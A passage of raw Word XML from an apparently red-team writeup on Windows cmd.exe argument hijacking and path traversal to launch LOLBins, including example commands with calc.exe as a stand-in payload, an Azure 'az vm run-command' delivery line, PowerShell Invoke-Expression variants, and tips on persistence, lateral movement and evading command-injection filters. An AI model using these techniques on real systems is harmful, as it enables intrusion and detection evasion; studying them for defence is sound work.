        <w:t xml:space="preserve"> This behavior means </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>payload execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be disguised as part of a command argument, without traditional methods like file uploads or modifying registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058845B1" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="714D6F4C">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E647DA" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. LOLBin Execution via Argument Hijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F6B02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You can exploit binaries that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F990C62" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Accept multiple arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7CF194" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Ignore malformed arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C9CC5" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Continue to execute even when provided a confusing command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2721E3" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4BBFBC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cmd.exe /c "ping ;calc.exe;127.0.0.1/../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74074099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 xml:space="preserve">Even though cmd doesn’t treat ; as a separator like Bash, </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell does</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. This means in specific contexts, you might trick PowerShell into executing unintended commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55461B5A" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="42B3A92D">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D942994" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Hijack Execution Flow with Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380C0375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You can manipulate commands like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FED8089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cmd.exe /c "ping 127.0.0.1/../calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1568EA3A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If the path is resolved successfully, Windows executes calc.exe from C:\Windows\System32, effectively bypassing the intention of running ping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EE8078" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="016DF2DA">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC36DC8" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. LOLBin Hunting Criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70578AF6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To make this useful in the wild or during post-exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B0290" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Find a </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>LOLBAS binary</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that accepts multiple arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E509D" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The binary </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>must not crash</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with malformed input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39076C01" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ideally, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ignores first/last arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and still executes properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC73B73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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240A9DB" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ieexec.exe from the LOLBAS project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C112CB" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mshta.exe, wscript.exe, forfiles.exe, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFAE697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This allows your payload to execute even if you can't fully control the full argument string (as in environment variables, scheduled tasks, or weak command injection filters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CF79C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="720A3DF4">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6403D3" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure CLI and PowerShell Usage Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F37B8F" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Azure, this technique could be weaponized by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D808D9" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Abusing Run Command</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Send payloads like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D835E3" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az vm run-command invoke --resource-group MyRG --name WinVM --command-id RunPowerShellScript --scripts "cmd.exe /c 'ping 127.0.0.1/../../../windows/system32/calc.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12982321" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Modifying startup tasks or startup scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Windows VMs where input is not properly validated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71885E69" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="0DF7B2A8">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="179ACF8B" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Variants:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918C277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$cmd = 'cmd.exe /c "ping 127.0.0.1/../../../windows/system32/calc.exe"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E92732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Invoke-Expression $cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C918C72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Or encoded payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5BEBE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$payload = "calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3343E1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$cmd = "cmd.exe /c ping ;$payload;/../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C00C2C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Invoke-Expression $cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9FAA28" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="728D7D2B">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4FA6E3" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Detection Avoidance in Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC20A96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Since many Azure VMs rely on Run Command or even Custom Script Extensions, you may see this abused in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1CF835" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Obfuscated malware commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116AC952" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Scheduled tasks with malformed command lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA0DE1" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Registry keys used to start legitimate scripts, but redirected via argument hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B34855" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="3907C5EB">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEAA552" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Red Team Use Cases in Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4F65C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Abuse in Lateral Movement</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Use schtasks, runas, or at to persist with camouflaged binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FBEA69" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Evade Filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Command injection filters often catch ;, &amp;&amp;, |, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>path traversal + LOLBin</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> evades these</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C8074" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Use cmd.exe /c in service paths or task actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB8D8D4" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="7A40A667">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30630C11" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Key Lessons &amp; Research Insights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2B3DA" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe does </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>pre-existence checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using QueryDirectory, not CreateFile, making detection harder via classic API hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484A9D91" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Executables with </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
